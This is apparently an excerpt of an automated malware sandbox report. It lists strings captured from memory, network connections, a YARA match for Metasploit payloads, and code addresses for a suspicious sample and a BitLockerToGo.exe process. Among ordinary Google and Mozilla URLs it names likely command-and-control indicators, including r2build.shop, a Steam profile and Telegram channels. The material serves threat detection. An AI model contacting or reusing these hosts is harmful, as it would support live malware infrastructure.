            Source: chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
            Source: chrome.exe, 00000005.00000003.2122821015.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
            Source: chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
            Source: chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
            Source: chrome.exe, 00000005.00000003.2136988473.0000056001B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
            Source: chrome.exe, 00000005.00000003.2136988473.0000056001B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
            Source: chrome.exe, 00000005.00000003.2136988473.0000056001B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
            Source: chrome.exe, 00000005.00000003.2136988473.0000056001B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
            Source: chrome.exe, 00000005.00000003.2100981058.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
            Source: chrome.exe, 00000005.00000003.2136988473.0000056001B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
            Source: chrome.exe, 00000005.00000003.2104466531.0000056000C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105056283.0000056001100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2105153832.000005600120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2104881176.00000560003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
            Source: chromecache_62.7.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
            Source: chromecache_65.7.drString found in binary or memory: https://plus.google.com
            Source: chromecache_65.7.drString found in binary or memory: https://plus.googleapis.com
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
            Source: BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop
            Source: BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop&
            Source: BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2078079398.00000000007C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/
            Source: BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/(
            Source: BitLockerToGo.exe, 00000004.00000003.2020623455.0000000000772000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/1
            Source: BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/:
            Source: BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/X
            Source: BitLockerToGo.exe, 00000004.00000003.2078155669.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/exe
            Source: BitLockerToGo.exe, 00000004.00000003.2078155669.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/ge
            Source: BitLockerToGo.exe, 00000004.00000003.2047747108.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/p0
            Source: BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/v
            Source: BitLockerToGo.exe, 00000004.00000003.2034519534.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shop/~
            Source: BitLockerToGo.exe, 00000004.00000003.2078155669.0000000000772000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shopf
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shopm
            Source: BitLockerToGo.exe, 00000004.00000003.2020623455.0000000000772000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shopr
            Source: BitLockerToGo.exe, 00000004.00000003.2020623455.0000000000772000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2007421867.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r2build.shopv
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
            Source: chrome.exe, 00000005.00000003.2110861600.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: chrome.exe, 00000005.00000003.2116647879.000005600140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121821114.0000056001448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116827607.000005600141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116527470.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121558192.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121654993.000005600136C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
            Source: DyM4yXX.exe, 00000000.00000003.1981304256.0000000009B94000.00000004.00001000.00020000.00000000.sdmp, DyM4yXX.exe, 00000000.00000003.1981580595.00000000099D3000.00000004.00001000.00020000.00000000.sdmp, DyM4yXX.exe, 00000000.00000003.1980014340.0000000009E66000.00000004.00001000.00020000.00000000.sdmp, DyM4yXX.exe, 00000000.00000003.1980944998.0000000009C48000.00000004.00001000.00020000.00000000.sdmp, DyM4yXX.exe, 00000000.00000003.1979696180.0000000009CBC000.00000004.00001000.00020000.00000000.sdmp, DyM4yXX.exe, 00000000.00000002.1986119974.00000000099D4000.00000004.00001000.00020000.00000000.sdmp, DyM4yXX.exe, 00000000.00000003.1980959186.0000000009C38000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2391375905.00000000004C7000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199816275252
            Source: BitLockerToGo.exe, 00000004.00000002.2391375905.00000000004C7000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199816275252js4tnMozilla/5.0
            Source: BitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: BitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, u3opp8.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004E03000.00000004.00000020.00020000.00000000.sdmp, u3opp8.4.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004E28000.00000004.00000020.00020000.00000000.sdmp, u3opp8.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004E03000.00000004.00000020.00020000.00000000.sdmp, u3opp8.4.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/fwX
            Source: BitLockerToGo.exe, 00000004.00000003.1993020383.0000000000774000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/no111p
            Source: BitLockerToGo.exe, 00000004.00000003.1993020383.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/no111p.
            Source: BitLockerToGo.exe, 00000004.00000002.2391688349.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/no111pZ
            Source: BitLockerToGo.exe, 00000004.00000002.2391375905.00000000004C7000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/no111pjs4tnMozilla/5.0
            Source: BitLockerToGo.exe, 00000004.00000003.1993020383.0000000000774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
            Source: chromecache_65.7.drString found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
            Source: BitLockerToGo.exe, 00000004.00000002.2396533056.0000000005395000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EB8000.00000004.00000020.00020000.00000000.sdmp, 6fu3ek.4.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, cj58q9.4.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: BitLockerToGo.exe, 00000004.00000002.2396533056.0000000005395000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EB8000.00000004.00000020.00020000.00000000.sdmp, 6fu3ek.4.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: chrome.exe, 00000005.00000003.2110861600.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
            Source: chrome.exe, 00000005.00000003.2110861600.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: chrome.exe, 00000005.00000003.2110861600.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: chrome.exe, 00000005.00000003.2089497215.0000056000490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
            Source: chrome.exe, 00000005.00000003.2116469031.0000056000FA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
            Source: BitLockerToGo.exe, 00000004.00000002.2393078218.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, cj58q9.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: chrome.exe, 00000005.00000003.2116647879.000005600140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121821114.0000056001448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116827607.000005600141C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116527470.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121558192.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121654993.000005600136C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
            Source: chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
            Source: chrome.exe, 00000005.00000003.2104881176.00000560003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
            Source: chrome.exe, 00000005.00000003.2110861600.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
            Source: chromecache_65.7.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
            Source: chromecache_65.7.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
            Source: chrome.exe, 00000005.00000003.2124689219.000005600148C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
            Source: chrome.exe, 00000005.00000003.2110861600.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: chrome.exe, 00000005.00000003.2110861600.00000560002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: chromecache_62.7.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
            Source: chromecache_62.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
            Source: chromecache_62.7.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
            Source: chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
            Source: chrome.exe, 00000005.00000003.2120703416.0000056001050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120782469.000005600139C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121821114.0000056001448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116527470.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121558192.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2121654993.000005600136C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
            Source: chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp
            Source: chrome.exe, 00000005.00000003.2116360888.0000056001350000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2116724428.0000056001414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2120642678.00000560013BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd
            Source: BitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: BitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: BitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: BitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: BitLockerToGo.exe, 00000004.00000002.2397117721.0000000005610000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
            Source: chrome.exe, 00000005.00000003.2089698880.00000560006A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 94.130.191.182:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0048B846 CreateDesktopA,4_2_0048B846

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000003.1980406859.0000000009D92000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A0514_2_0049A051
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A40714_2_004A4071
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049E0E14_2_0049E0E1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B20814_2_004B2081
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF0B14_2_004AF0B1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004991614_2_00499161
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF1714_2_004AF171
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A1114_2_0049A111
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049B1114_2_0049B111
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B11114_2_004B1111
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A41C14_2_004A41C1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B01D14_2_004B01D1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049E1F14_2_0049E1F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A11914_2_004A1191
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A1B14_2_0049A1B1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049A2514_2_0049A251
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B02614_2_004B0261
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004992014_2_00499201
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF2114_2_004AF211
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A42814_2_004A4281
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049B2A14_2_0049B2A1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0049E2B14_2_0049E2B1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A43414_2_004A4341
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF3014_2_004AF301
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004993314_2_00499331
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004843E14_2_004843E1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004A43E14_2_004A43E1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B03F14_2_004B03F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004AF3F14_2_004AF3F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004B13814_2_004B1381
